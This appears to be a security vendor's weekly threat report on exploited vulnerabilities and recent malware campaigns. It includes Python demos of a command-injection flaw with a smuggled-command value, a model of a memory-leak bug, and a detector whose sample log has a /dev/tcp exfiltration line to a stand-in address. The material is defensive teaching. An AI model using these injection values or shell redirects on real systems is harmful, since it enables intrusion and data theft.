Executive Summary
This week two vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog: a code injection flaw in Hewlett Packard Enterprise OneView and a 2009 memory-corruption bug in Microsoft Office PowerPoint, a reminder that long-patched flaws keep resurfacing because they are still being exploited. Separately, active exploitation was detected against legacy D-Link DSL gateway products, reinforcing the persistent danger posed by end-of-life infrastructure that remains exposed on the internet.
In parallel, threat intelligence observed renewed exploitation of the React2Shell vulnerability by the RondoDox botnet, showing how quickly attackers adapt to modern web frameworks. Notable threat activity throughout the week underscored a broader trend: threat actors are increasingly blending vulnerability exploitation with evolving tools, trusted platforms, and social engineering techniques to accelerate compromise, expand reach, and bypass traditional defenses, setting an aggressive tone for the threat landscape at the start of the year.
Key points:
- 2 vulnerabilities added to the CISA KEV catalog.
- Active exploitation detected in D-Link DSL Gateway devices.
- Cytellite sensor telemetry detected exploit scanning activity targeting globally exposed assets.
- Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.
- Viber leveraged as an initial access vector.
- "System fix" lures deliver DCRat malware.
- Malicious AI browser extensions impact over 900,000 installations.
What are the top trending or critical vulnerabilities observed this week?
Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.
CVE-2026-0625 - Command Injection vulnerability in D-Link DSL gateway devices
A Command Injection vulnerability affecting legacy D-Link DSL gateway routers, including the DSL-526B, DSL-2640B, DSL-2740R, and DSL-2780B, was identified in the dnscfg.cgi endpoint, where user-supplied DNS server parameters reach the underlying system without sanitization. According to VulnCheck, the flaw enables unauthenticated remote code execution and is linked to DNSChanger-style unauthenticated DNS modification, a technique historically abused at scale. Active exploitation was observed in the wild after The Shadowserver Foundation detected a live attack on one of its honeypots using a previously undocumented technique. D-Link has confirmed these devices reached end of life more than five years ago and will not receive patches; the only mitigation is to decommission affected units or isolate them from the internet immediately and replace them with supported hardware.
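To make the bug class concrete, the following is an added Python model of the unsafe pattern and its fix. It is not D-Link's firmware code: only the shape described above (a DNS server parameter reaching a shell without validation) comes from the advisory, while the parameter name, the use of echo as a stand-in for the real command, and the sample payload are assumptions made for the demonstration.

```python
import ipaddress
import subprocess

# Constructed sample input: a "DNS server" value carrying a second shell command.
INJECTION_PAYLOAD = "8.8.8.8; echo INJECTED"


def apply_dns_vulnerable(primary: str) -> str:
    """Unsafe pattern: the user-supplied value is spliced into a shell command
    string. 'echo' stands in for whatever the CGI really invokes; the shell
    sees the ';' and runs the attacker's second command as well."""
    cmd = f"echo nameserver {primary}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_dns_server(value: str) -> str:
    """Allow-list check: a DNS server parameter must parse as exactly one
    IPv4 or IPv6 address. Anything else (spaces, ';', quotes) is rejected."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        raise ValueError(f"rejected DNS server parameter: {value!r}") from None


def apply_dns_hardened(primary: str) -> str:
    """Validate first, then hand the value over as a discrete argv element so
    no shell ever gets to interpret it."""
    addr = validate_dns_server(primary)
    return subprocess.run(["echo", "nameserver", addr],
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    print("vulnerable:", repr(apply_dns_vulnerable(INJECTION_PAYLOAD)))
    try:
        apply_dns_hardened(INJECTION_PAYLOAD)
    except ValueError as err:
        print("hardened:", err)
```

Running it shows the vulnerable path printing INJECTED on a second line, while the hardened path never reaches a shell at all: the value is either an IP address or it is dropped before any process is spawned.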
CVE-2025-14847 - Improper Handling of Length Parameter Inconsistency Vulnerability in MongoDB and MongoDB Server
An Improper Handling of Length Parameter Inconsistency vulnerability in MongoDB and MongoDB Server, code-named MongoBleed, allowed unauthenticated attackers to remotely leak sensitive data from server memory by abusing the zlib-based message compression and decompression logic. By sending compressed messages whose declared uncompressed length did not match the data actually produced, attackers could cause the server to return uninitialized heap memory, exposing credentials, API keys, cached queries, and other sensitive artifacts without authentication or user interaction. Because zlib compression is enabled by default, the issue affected a wide range of MongoDB versions across cloud and on-premises deployments, with more than 87,000 potentially vulnerable instances identified globally. The flaw posed heightened risk to internet-exposed databases because it is reachable before authentication and has low exploitation complexity. MongoDB addressed the issue in updated releases, and the vulnerability was added to the CISA KEV catalog, confirming active exploitation in the wild.
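The following is an added, simplified model of the length-inconsistency bug class described above, written for this page rather than taken from MongoDB's source. Only the OP_COMPRESSED body layout (originalOpcode int32, uncompressedSize int32, compressorId uint8, then the compressed bytes) is taken from the wire protocol; the HEAP buffer, the fake secret inside it, and the MAX_UNCOMPRESSED cap are constructed for the demonstration.

```python
import struct
import zlib

OP_MSG = 2013
COMPRESSOR_ZLIB = 2
BODY_HEADER = struct.Struct("<iiB")        # originalOpcode, uncompressedSize, compressorId
MAX_UNCOMPRESSED = 48 * 1024 * 1024        # assumed sanity cap on the declared size

# Stand-in for a freshly allocated but never zeroed region: leftovers from an
# earlier request are still sitting in it (constructed, not real server memory).
HEAP = bytearray(b"\x00" * 16 + b"api_key=sk-live-EXAMPLE;" + b"\x00" * 24)


def build_op_compressed(payload: bytes, claimed_size: int) -> bytes:
    """Build an OP_COMPRESSED body. claimed_size is what the *client* asserts
    the decompressed length is; an honest client passes len(payload)."""
    return BODY_HEADER.pack(OP_MSG, claimed_size, COMPRESSOR_ZLIB) + zlib.compress(payload)


def decompress_vulnerable(body: bytes) -> bytes:
    """Trusts uncompressedSize: takes that many bytes of dirty heap, writes the
    real data over the front, and returns the whole buffer. Everything past
    len(data) is whatever the allocator left behind."""
    _, claimed, _ = BODY_HEADER.unpack_from(body)
    data = zlib.decompress(body[BODY_HEADER.size:])
    buf = bytearray(HEAP[:claimed])        # uninitialised allocation, modelled
    buf[:len(data)] = data
    return bytes(buf)


def decompress_hardened(body: bytes) -> bytes:
    """Bounds the declared size, caps inflation at that size, and refuses any
    message whose real decompressed length differs from what was declared."""
    _, claimed, comp_id = BODY_HEADER.unpack_from(body)
    if comp_id != COMPRESSOR_ZLIB:
        raise ValueError(f"unexpected compressorId {comp_id}")
    if not 0 <= claimed <= MAX_UNCOMPRESSED:
        raise ValueError(f"uncompressedSize {claimed} out of range")
    inflater = zlib.decompressobj()
    # One byte of slack so an over-long stream shows up as len(data) > claimed
    # instead of being silently truncated to fit.
    data = inflater.decompress(body[BODY_HEADER.size:], claimed + 1)
    if len(data) != claimed or not inflater.eof or inflater.unconsumed_tail:
        raise ValueError("uncompressedSize does not match decompressed data")
    return data


if __name__ == "__main__":
    honest = build_op_compressed(b"{hello}", 7)
    lying = build_op_compressed(b"{hello}", 48)
    print("vulnerable, honest:", decompress_vulnerable(honest))
    print("vulnerable, lying: ", decompress_vulnerable(lying))
    try:
        decompress_hardened(lying)
    except ValueError as err:
        print("hardened, lying:   ", err)
```

The "lying" message declares 48 bytes but only inflates to 7; the vulnerable path dutifully returns 48 bytes, 41 of which were never written by this request, and the stale API key in the modelled heap comes back with them. The hardened path treats the declared length as a claim to be verified, not a size to be trusted, and also bounds it so a forged header cannot drive a huge allocation.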
CVE-2025-37164 - Code Injection vulnerability in Hewlett Packard Enterprise OneView
A Code Injection vulnerability in Hewlett Packard Enterprise OneView allows a remote unauthenticated attacker to achieve remote code execution, posing a severe risk to affected environments. According to the vendor, the flaw affects all OneView versions prior to 11.0.0, with hotfixes available for versions 5.20 through 10. A detailed proof-of-concept was published by Rapid7 in December 2025, increasing the likelihood of exploitation. Reflecting its severity and real-world risk, the vulnerability was added to the CISA KEV catalog this week; organizations should apply the update or the relevant hotfix immediately.
CVE-2009-0556 - Code Injection vulnerability in Microsoft Office PowerPoint
A Code Injection vulnerability in Microsoft Office PowerPoint allows attackers to execute arbitrary code through memory corruption triggered by an invalid index value in the OutlineTextRefAtom structure of a specially crafted PowerPoint file. Successful exploitation gives the attacker code execution in the context of the logged-in user, and the attack requires the victim to open the malicious file, typically delivered via email or a malicious website. Although the vulnerability was publicly disclosed and patched by Microsoft in 2009 and was previously exploited in limited, targeted campaigns attributed to Chinese APT actors, it has now been added to the CISA KEV catalog, underscoring its continued relevance and exploitation risk.
What did Cytellite sensors detect this week?
Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.
Which vulnerabilities were abused by malware this week?
Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analysed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.
CVE-2025-55182
According to CloudSEK, a newly observed wave of RondoDox activity, reconstructed from exposed command-and-control logs, reveals a sustained nine-month campaign automating attacks against vulnerable web applications and IoT devices. The group rapidly adapted to emerging attack trends by weaponizing the React Server Components vulnerability tracked as React2Shell (CVE-2025-55182), reachable through frameworks such as Next.js, to achieve remote code execution at scale, making it a dominant attack vector by December 2025.
Between December 8 and 16, RondoDox conducted large-scale scanning to identify susceptible servers using blind RCE techniques, validating exploitation with commands such as echo VULN, whoami, and arithmetic tests whose output was exfiltrated via shell redirects. From December 13 onward, exploitation surged to hourly attack levels, indicating a shift from reconnaissance to active compromise, driven by the vulnerability's prevalence in modern web stacks and its effectiveness in enabling rapid payload deployment beyond traditional botnet, web shell, and cryptomining use cases.
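The validation commands listed above are a useful hunting signal on their own, independent of the exploit delivery. The following is an added detection sketch, not CloudSEK's or anyone's published ruleset: the log format, the log lines, and the IP addresses are constructed for the example, and the indicator list is a starting point rather than a complete signature set.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Indicators of blind-RCE validation, modelled on the commands reported in the
# RondoDox scans: a fixed marker echo, identity check, arithmetic canary, and
# redirection of the result somewhere the attacker can read it back.
INDICATORS = {
    "echo_marker": re.compile(r"\becho\s+VULN\b"),
    "whoami":      re.compile(r"\bwhoami\b"),
    "arith_expr":  re.compile(r"\bexpr\s+\d+\s*[-+*/]\s*\d+"),
    "arith_shell": re.compile(r"\$\(\(\s*\d+\s*[-+*/]\s*\d+\s*\)\)"),
    "redirect":    re.compile(r">{1,2}\s*/(?:tmp|dev)/\S*"),
}

# Constructed log format: timestamp, source IP, method, path, decoded request body.
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>\S+)\s+(?P<path>\S+)\s+(?P<body>.*)$")

# Constructed sample log (TEST-NET addresses); the fourth line is benign noise.
SAMPLE_LOG = """\
2025-12-09T03:14:07Z 203.0.113.7 POST / echo VULN
2025-12-09T03:14:09Z 203.0.113.7 POST / whoami > /tmp/.o
2025-12-09T03:14:11Z 203.0.113.7 POST / expr 41 + 1 >> /tmp/.o
2025-12-09T03:20:00Z 198.51.100.4 POST /api/notes {"title":"echo","body":"VULNerable? no, just text"}
2025-12-09T03:21:44Z 192.0.2.9 POST / $((7*6)) > /dev/tcp/192.0.2.9/4444
"""


def classify_body(body: str) -> set[str]:
    """Return the names of every indicator that fires on one decoded request body."""
    return {name for name, rx in INDICATORS.items() if rx.search(body)}


def detect(log_text: str, min_indicators: int = 2) -> dict[str, dict]:
    """Group indicator hits per source IP. A source that trips at least
    min_indicators distinct indicators is reported as blind-RCE validation;
    a lone hit is kept but labelled so an analyst can triage it separately."""
    per_src: dict[str, dict] = defaultdict(
        lambda: {"indicators": set(), "hits": 0, "first_seen": None})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                                   # unparseable line, skip
        found = classify_body(m["body"])
        if not found:
            continue                                   # nothing suspicious
        rec = per_src[m["src"]]
        rec["indicators"] |= found
        rec["hits"] += 1
        rec["first_seen"] = rec["first_seen"] or m["ts"]
    return {
        src: {**rec, "verdict": ("blind-rce-validation"
                                 if len(rec["indicators"]) >= min_indicators
                                 else "single-indicator")}
        for src, rec in per_src.items()
    }


if __name__ == "__main__":
    for src, rec in detect(SAMPLE_LOG).items():
        print(src, rec["verdict"], sorted(rec["indicators"]), "first seen", rec["first_seen"])
```

Keying on the source rather than on single requests matters here: the reconnaissance phase described above is a short burst of several small probes from one host, so the combination (marker echo, identity check, arithmetic canary, redirect) is a much stronger signal than any one of those strings, each of which will occasionally appear in legitimate traffic.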
Were any PRE-NVD vulnerabilities identified this week?
PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.
Notable threat activity observed this week
An overview of recently observed campaigns and tactics that reflect how threat actors are adapting tools, platforms, and social engineering methods.
- The Russia-aligned threat actor UAC-0184 (also tracked as Hive0156) has been observed targeting Ukrainian military and government entities by abusing Viber as an initial intrusion vector to deliver malicious ZIP archives. Known for war-themed phishing lures that deploy Hijack Loader as a precursor to Remcos RAT infections, the group has steadily expanded beyond email. Recent campaigns show a tactical shift toward Signal and Telegram, signaling an evolution toward multi-platform messaging abuse for malware delivery.
- Researchers have uncovered a new campaign dubbed PHALT#BLYX that abuses ClickFix-style lures presenting fake blue screen of death (BSoD) fixes to compromise organizations in the European hospitality sector. Detected in late December 2025, the multi-stage operation ultimately delivers DCRat (aka DarkCrystal RAT), an off-the-shelf RAT and a variant of AsyncRAT. The campaign highlights how social-engineering-driven "fix" prompts continue to be an effective vector for stealthy remote access malware deployment.
- Cybersecurity researchers have identified two malicious extensions on the Chrome Web Store that covertly exfiltrate conversations from ChatGPT and DeepSeek, along with users’ browsing data, to attacker-controlled servers. The extensions - “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” and “AI Sidebar with Deepseek, ChatGPT, Claude, and more” - have collectively amassed over 900,000 installs, amplifying their potential impact. The findings underscore the growing abuse of AI-branded browser add-ons as a stealthy vector for large-scale data theft.
Conclusion
Recent developments reinforce a clear reality - old and new vulnerabilities alike remain actively weaponized, especially across unsupported infrastructure and modern web stacks. The resurgence of legacy flaws, alongside rapid exploitation of emerging technologies, highlights how quickly attackers adapt their playbooks. Loginsoft Vulnerability Intelligence (LOVI) helps organizations stay ahead of this curve by correlating real-world exploitation, KEV additions, and emerging attacker tactics into actionable intelligence. By leveraging LOVI, security teams can prioritize remediation, reduce exposure windows, and proactively defend against an increasingly fast-moving threat landscape.
FAQs:
1) What is React2Shell and why is it appealing for threat actors?
A) React2Shell refers to CVE-2025-55182, a critical RCE flaw in React Server Components that allows unauthenticated attackers to run arbitrary code on vulnerable servers. Its appeal lies in the zero-authentication attack surface, widespread adoption of React frameworks, and the ability to rapidly gain initial access for malware deployment, persistence, or botnet expansion.
2) How does LOVI help organizations manage vulnerabilities effectively?
A) Loginsoft Vulnerability Intelligence empowers you to efficiently prioritize and respond to potential vulnerabilities by focusing on those actively exploited in the wild. LOVI correlates vulnerability data with real-world threat activity to reduce noise and improve decision-making. This approach enables faster remediation and stronger security posture.
3) What is MongoDB?
A) MongoDB is a widely used NoSQL database that stores data in flexible BSON (Binary JSON) documents instead of fixed tables. It is designed to handle large volumes of structured and unstructured data with high performance. MongoDB is commonly deployed across cloud and on-premises environments to support scalable, highly available, and distributed applications.
4) What is Cytellite?
A) Cytellite is a Loginsoft security intelligence platform that provides real-time visibility into emerging threats through a global sensor network. It delivers actionable IP intelligence to help organizations detect, analyze, and respond to attacks quickly. By correlating threat data with live activity, Cytellite strengthens resilience across dynamic threat landscapes.